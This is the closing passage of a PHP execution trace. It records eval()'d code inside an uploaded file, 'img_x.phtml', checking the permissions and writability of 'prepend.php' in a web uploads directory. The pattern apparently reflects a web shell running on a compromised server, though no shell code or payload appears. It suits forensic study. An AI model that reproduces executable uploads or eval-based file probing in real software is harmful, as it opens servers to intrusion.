3	55	0	0.009167	892184	perms	1		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1480	1	'/var/www/html/uploads/prepend.php'
4	56	0	0.009181	892184	fileperms	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	1	'/var/www/html/uploads/prepend.php'
4	56	1	0.009196	892224
4	56	R			33261
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	$perms = 33261
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1504	$info = '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1523	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1524	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1527	$info .= 'x'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1530	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1531	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1534	$info .= 'x'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1537	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1538	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1541	$info .= 'x'
3	55	1	0.009408	892224
3	55	R			'-rwxr-xr-x'
3	57	0	0.009440	892184	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/prepend.php'
3	57	1	0.009477	892224
3	57	R			FALSE
3	58	0	0.009504	892184	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/prepend.php'
3	58	1	0.009534	892224
3	58	R			TRUE
2	8	1	0.009579	892120
1	3	1	0.009645	614568
			0.009705	525344
TRACE END   [2023-02-12 19:35:39.884427]

